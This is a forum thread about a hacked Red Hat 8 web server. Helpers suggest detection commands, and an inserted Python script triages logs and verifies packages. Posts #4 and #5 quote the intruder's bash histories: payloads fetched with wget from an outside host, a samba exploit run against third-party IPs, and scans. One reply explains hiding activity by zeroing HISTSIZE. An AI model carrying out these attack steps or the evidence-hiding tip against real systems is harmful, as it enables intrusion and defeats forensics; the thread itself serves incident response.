  1. #1  Just Joined! | Join Date: Apr 2003 | Posts: 5

    Very Strange Problem - Have I been hacked?

    Hey,

    I'm running an RH8 server with Apache, PHP, PHPNuke, MySQL, SSH, etc. - it's publicly facing.

    Yesterday, I noticed that my system was down (networking not running) - so I rebooted. On startup I noticed lots of messages referring to a segmentation fault - I narrowed the fault down to 'grep' - every time I run grep, I get the segmentation fault. I looked at the 'grep' file and compared it to another RH8 system I have here (private system) - the size of grep was different, so I renamed the bad grep, copied the grep from the other system and ran it - worked fine. (Bad grep size = 120360, good grep 116264)

    However, after a while, the good grep changed size (for reasons I can't work out) to the same size as the bad grep. It also now does the segmentation fault thing.

    I renamed and copied again - and the exact same thing happened.

    Checked my logs and found this :

    <security log>
    Apr 27 16:36:10 spr6 sshd[19263]: Failed password for x from 203.130.216.132 port 1171
    Apr 27 16:36:16 spr6 sshd[19263]: Accepted password for x from 203.130.216.132 port 1171
    Apr 27 16:58:54 spr6 sshd[19321]: Failed password for x from 203.130.216.129 port 1172
    Apr 27 16:59:16 spr6 sshd[19321]: Accepted password for x from 203.130.216.129 port 1172
    Apr 27 21:56:21 spr6 sshd[24219]: Did not receive identification string from 206.57.63.9
    Apr 27 21:57:48 spr6 sshd[24220]: Did not receive identification string from 206.57.63.9

    I didn't think that I had a user called 'x' on my system - checked on the other system and yep , no x

    Here's the entry out of the /etc/passwd file

    x:502:502::/dev/x:/bin/basha

    There was also another user created named 'zunja', but I deleted it before I knew what was going on, having thought I may have created this one during my testing ages ago....

    I don't get it - my root password is very strong, not in a dictionary, etc. - maybe I wasn't hacked??

    Can anyone shed any light on this ???

    I don't want to rebuild the system and I would really like to find out what happened. I reckon that by getting grep working properly, it will be all good again....

    BTW - the web server wasn't running anything very interesting....

  2. #2  Linux Guru | Join Date: Oct 2001 | Location: Täby, Sweden | Posts: 7,578
    Yeah, you're most probably cracked. Although I'd recommend that you reinstall your system, I have myself had one of my boxes cracked (even rooted, like you probably are now) a few times, and it's all restored to normal.
    Check if some normal utils have been altered with "rpm -V sh-utils textutils" and some other packages you might want to check. Also check your /etc/rc.d/rc.sysinit and similar files to see if they've been altered. You might also want to check if ps hides anything from you with these:
    Code:
    ps -Am | wc
    ls -d /proc/[0-9]* | wc
    The first one is supposed to report one more line, since ps also prints a header line, so don't worry about that.
    Also, check for processes that have their executable files removed or hidden in dot-directories:
    Code:
    ls -l /proc/[0-9]*/exe 2>/dev/null | grep -e delete -e \\.
    You might also want to check out that /dev/x directory.
    Also, do this:
    Code:
    find / -name .bash_history 2>/dev/null
    No worm that I've seen has covered that track. Therefore, if you check out any unexpected .bash_histories, you might be able to see what it did, and therefore be able to undo it.

    Also remember to report 203.130.216.132 to his ISP. Check which one that is with "whois -h whois.arin.net 203.130.216.132".

  3. #3  Linux Guru | Join Date: Oct 2001 | Location: Täby, Sweden | Posts: 7,578
    I checked that IP for you, and it came from Indonesia, so I queried it against whois.apnic.net instead, which returned this:
    Code:
    inetnum:      203.130.192.0 - 203.130.223.255
    netname:      TELKOMNET
    descr:        PT TELEKOMUNIKASI INDONESIA
    descr:        Jln Japati No 1
    country:      ID
    admin-c:      JW1-ID
    tech-c:       EH10-AP
    remarks:      service provider
    mnt-by:       APNIC-HM
    mnt-lower:    MAINT-TELKOMNET
    changed:      hm-changed@apnic.net 20030226
    changed:      hm-changed@apnic.net 20030228
    status:       ALLOCATED PORTABLE
    source:       APNIC

    person:       Joedi Wisoeda
    address:      PT TELEKOMUNIKASI INDONESIA (DIVMEDIA)
    address:      Jln Kebon Sirih No. 37
    address:      JAKARTA 10340
    country:      ID
    phone:        +62-21-3160500 Ext. 312
    fax-no:       +62-21-3160700
    e-mail:       joedi@telkom.co.id
    nic-hdl:      JW1-ID
    mnt-by:       MAINT-TELKOMNET
    changed:      joedi@telkom.co.id 20020729
    source:       APNIC

    person:       ERI PUNTA HENDRASWARA
    address:      PT. TELEKOMUNIKASI INDONESIA (DIVMEDIA)
    address:      GRAHA CITRA CARAKA BUILDING
    address:      Jl. Gatot Subroto Kav. 52 , 3 rd floor
    address:      Jakarta, Indonesia 12710
    country:      ID
    phone:        +62-21-5229248
    fax-no:       +62-21-5222296
    e-mail:       phunta@telkom.co.id
    nic-hdl:      EH10-AP
    mnt-by:       MAINT-TELKOMNET
    changed:      joedi@telkom.net.id 19980831
    source:       APNIC
    So, go to http://www.telkom.co.id/, try to find their abuse report address, and report this to them. If you can't find it, just try abuse@telkom.co.id, or one of the listed addresses, like joedi@telkom.co.id or phunta@telkom.co.id.

  4. #4  Just Joined! | Join Date: Apr 2003 | Posts: 5
    Thanks for that

    Hmmmmm - looks like you are right.

    <.bash_history of user x>

    mkdir " "
    cd " "
    wget 216.10.18.215/source/r.c
    gcc -o sj r.c
    ls -al
    cat /tc/passwd
    cat /etc/passwd
    mkdir " "
    cd " "
    ls -al
    wget 216.10.18.215/source/mass_samba.tar.gz
    tar -xzf mass_samba.tar.gz
    cd sambal
    ./sambal -b2 -v 202.139.229.85
    ls
    ./mass_samba_obsd_31 202 139 139
    ./sambal -b2 -v 203.75.8.197
    ./sambal -b2 -v 203.131.96.179
    ./sambal -b2 -v 203.51.200.19
    ./sambal -b2 -v 203.51.200.19
    ./sambal -b2 -v 66.147.116.49
    ssh -p 9999 66.147.116.49
    ssh -p 9999 -l root 66.147.116.49
    cd " "/sambal
    ping 66.147.30.140
    ./sambal -b2 -v 66.147.30.140
    ssh -p 9999 66.147.30.140
    ./sambal -b2 -v 62.148.81.107
    ./sambal -b2 -v 24.237.3.43
    ping 24.237.3.43
    ping 203.250.136.217
    ./sambal -b2 -v 203.250.136.217
    cd ..
    lynx -source 216.10.18.215/source/scanbsd.tar.gz > scanbsd.tar.gz
    wget 216.10.18.215/source/scanbsd.tar.gz > scanbsd.tar.gz
    ls -al
    rmscanbsd.tar.gz.1
    rm scanbsd.tar.gz.1
    rm scanbsd.tar.gz
    wget 216.10.18.215/source/scanbsd.tar.gz > scanbsd.tar.gz
    ls -al
    rm scanbsd.tar.gz
    mv scanbsd.tar.gz.1 scanbsd.tar.gz
    tar -xzf scanbsd.tar.gz
    ./scanbsd 206

    More...

    [root@www /]# rpm -V sh-utils textutils
    S.5....T /bin/basename
    S.5....T /usr/bin/md5sum

    More...

    [root@www x]# find / -name scanbsd -print
    /dev/x/ /scanbsd

    I have reported this to the places you suggest

    I had a look at rc.sysinit - I'm not very good with scripting, it would take me ages to go through it all -

    Easier to backup my data, rebuild (a more secure) system

    Thanks very much for your help !
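Pulling the checks from the two posts above into one offline script, as an added example that is not part of the thread: it decodes `rpm -V` flag strings like the `S.5....T` lines quoted in post #4, finds sshd sessions where a failed password was followed by an accepted one (the pattern in post #1's log), audits /etc/passwd entries for the signs the `x` account shows (home under /dev, a shell that is not in /etc/shells), and flags /proc/<pid>/exe targets that are deleted or live in a dot-directory, the same two cases post #2's `ls | grep` one-liner looks for. The sample inputs are constructed from the thread's quoted lines; the passwd entry is normalized to seven fields (the copy in the thread shows six) and the /etc/shells list is assumed.

```python
"""Offline triage of the kind of evidence quoted in this thread: sshd auth log
lines, /etc/passwd entries, `rpm -V` flag strings and /proc/<pid>/exe targets.
Sample inputs below are constructed from the thread, not captured live."""
import os
import re

# Position-coded attributes in `rpm -V` output; '.' means the attribute matched.
RPM_VERIFY_FLAGS = {"S": "size", "M": "mode", "5": "md5", "D": "device",
                    "L": "symlink", "U": "user", "G": "group", "T": "mtime"}

SSHD_RE = re.compile(
    r"sshd\[(\d+)\]: (Failed|Accepted) password for (\S+) from (\S+) port (\d+)")


def parse_rpm_verify(output):
    """Return {path: set of changed attributes}; 'missing' files get {'missing'}."""
    findings = {}
    for line in output.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        flags, path = parts[0], parts[-1]
        if flags == "missing":
            findings[path] = {"missing"}
        else:
            findings[path] = {RPM_VERIFY_FLAGS.get(c, c) for c in flags if c != "."}
    return findings


def accepted_after_failure(log_lines):
    """(user, source ip) pairs where one sshd child logged a failed password and
    then an accepted one for the same user and source. Cross-check the user
    against the accounts you actually created."""
    failed, hits = set(), []
    for line in log_lines:
        m = SSHD_RE.search(line)
        if not m:
            continue
        pid, outcome, user, ip, _port = m.groups()
        if outcome == "Failed":
            failed.add((pid, user, ip))
        elif (pid, user, ip) in failed:
            hits.append((user, ip))
    return hits


def audit_passwd(passwd_text, valid_shells):
    """Flag entries whose shell is not in /etc/shells, whose home lives under
    /dev, that carry uid 0 without being root, or that share a uid."""
    seen, problems = {}, []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            problems.append((line, "malformed entry"))
            continue
        name, _pw, uid, _gid, _gecos, home, shell = fields
        if shell not in valid_shells:
            problems.append((name, "shell %s not in /etc/shells" % shell))
        if home == "/dev" or home.startswith("/dev/"):
            problems.append((name, "home directory under /dev"))
        if uid == "0" and name != "root":
            problems.append((name, "uid 0 account"))
        if uid in seen:
            problems.append((name, "shares uid %s with %s" % (uid, seen[uid])))
        seen.setdefault(uid, name)
    return problems


def suspicious_exe_targets(exe_targets):
    """exe_targets: {pid: readlink('/proc/<pid>/exe')}. Flags a binary unlinked
    after exec, or one running out of a dot-directory."""
    flagged = {}
    for pid, target in exe_targets.items():
        if target.endswith(" (deleted)"):
            flagged[pid] = "binary deleted from disk"
        elif any(p.startswith(".") for p in target.split("/") if p):
            flagged[pid] = "runs from a hidden directory"
    return flagged


def hidden_pids(ps_pids, proc_pids):
    """PIDs present in /proc but absent from ps output (a trojaned ps hides them)."""
    return sorted(set(proc_pids) - set(ps_pids))


def live_exe_targets():
    """/proc/<pid>/exe targets on the running host; entries we may not read
    (other users' processes, kernel threads) are skipped."""
    out = {}
    for name in os.listdir("/proc"):
        if name.isdigit():
            try:
                out[int(name)] = os.readlink("/proc/%s/exe" % name)
            except OSError:
                pass
    return out


# Constructed samples, taken from what the thread quotes.
SAMPLE_AUTH_LOG = [
    "Apr 27 16:36:10 spr6 sshd[19263]: Failed password for x from 203.130.216.132 port 1171",
    "Apr 27 16:36:16 spr6 sshd[19263]: Accepted password for x from 203.130.216.132 port 1171",
    "Apr 27 16:58:54 spr6 sshd[19321]: Failed password for x from 203.130.216.129 port 1172",
    "Apr 27 16:59:16 spr6 sshd[19321]: Accepted password for x from 203.130.216.129 port 1172",
    "Apr 27 21:56:21 spr6 sshd[24219]: Did not receive identification string from 206.57.63.9",
]
SAMPLE_RPM_V = "S.5....T /bin/basename\nS.5....T /usr/bin/md5sum"
# The thread's copy of the entry shows six fields; normalized to seven here.
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nx:x:502:502::/dev/x:/bin/basha\n"
SAMPLE_SHELLS = {"/bin/bash", "/bin/sh", "/sbin/nologin"}  # assumed /etc/shells

if __name__ == "__main__":
    print(accepted_after_failure(SAMPLE_AUTH_LOG))
    print(parse_rpm_verify(SAMPLE_RPM_V))
    print(audit_passwd(SAMPLE_PASSWD, SAMPLE_SHELLS))
    print(suspicious_exe_targets(live_exe_targets()))
```

Two caveats the thread itself illustrates. The `rpm -V` output in post #4 shows /usr/bin/md5sum modified, so neither md5sum nor, potentially, rpm and the libraries they load can be trusted on that box; verification has to run from clean media (a rescue disk, or the disk mounted on a known-good host). And the hidden-directory check only catches names starting with a dot: the attacker here also used directories named `" "` and `" ,"`, which neither the `grep -e \\.` one-liner nor `suspicious_exe_targets` would flag, whereas the ps-versus-/proc count and the package verification do not depend on the name at all.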

  5. #5  Just Joined! | Join Date: Apr 2003 | Posts: 5
    Found this in root's .bash_history too....

    export PATH="."
    inetd
    inetd
    inetd
    inetd
    w
    last -10
    /etc/rc.d/init.d/smb stop
    setup
    w
    mkdir /dev/ida/" ,"
    cd /dev/ida/" ,"
    cd /tmp
    ls -al
    mv emech.tar.gz /dev/ida/" ,"
    cd /dev/ida/" ,"
    tar xvzf emech.tar.gz
    cd emech
    pico mech.set
    vi mech.set
    bash
    w
    cd /dev/ida
    cd ...
    mkdir ...
    cd ...
    ftp never-ask-me-asl-pls.net
    tar xvfz new.tgz
    cd ne
    cd new
    ./scan 43.113
    ./scan 40.128
    ./scan 140.21
    ./scan 193.226
    exit

  6. #6  Linux Newbie | Join Date: Apr 2003 | Location: UK, Manchester | Posts: 147
    He/she is not very smart; the first thing you do is get rid of any evidence of unusual activity.
    Normally by setting the HISTSIZE bash variable to 0 so that it doesn't save anything to the history, and maybe checking /var/log/messages.

    Don't do a backup, and don't trust any previous backups. If you can't get an exact time that the intrusion occurred then you can't trust any of your backups.

    Save your config files (only the ones you need), check them for anything unusual and do a re-install.

    You might want to read some security texts to ensure (well, try to) that this doesn't happen again.
    Securing and Optimzing Red Hat Linux
    Securing Debian

  7. #7  Linux Engineer | Join Date: Jan 2003 | Location: Lebanon, PA | Posts: 994
    Haha, I can't believe they left a history file. What is this world coming to?

  8. #8  Linux Guru | Join Date: Oct 2001 | Location: Täby, Sweden | Posts: 7,578
    Well, seriously, every worm I've had a problem with has left a history file. Probably not the first thing a cracker would think of, right? (Certainly not the first thing I'd think of, at least)

  9. #9  Linux Newbie | Join Date: Apr 2003 | Location: UK, Manchester | Posts: 147
    Worms usually just have a single purpose and have no need for the system afterwards. Most half-decent crackers will want to keep from being noticed and use the system to launch attacks on other PCs/networks.

    This was a s'kiddie, not very good though. Don't understand why he would make hidden directories but not clear out the history.

    Maybe he felt comfortable that he wouldn't be caught?

  10. #10  Linux Guru | Join Date: Oct 2001 | Location: Täby, Sweden | Posts: 7,578
    Wouldn't it be funny if you could decode his password and see if he uses the same on his home computer? =)
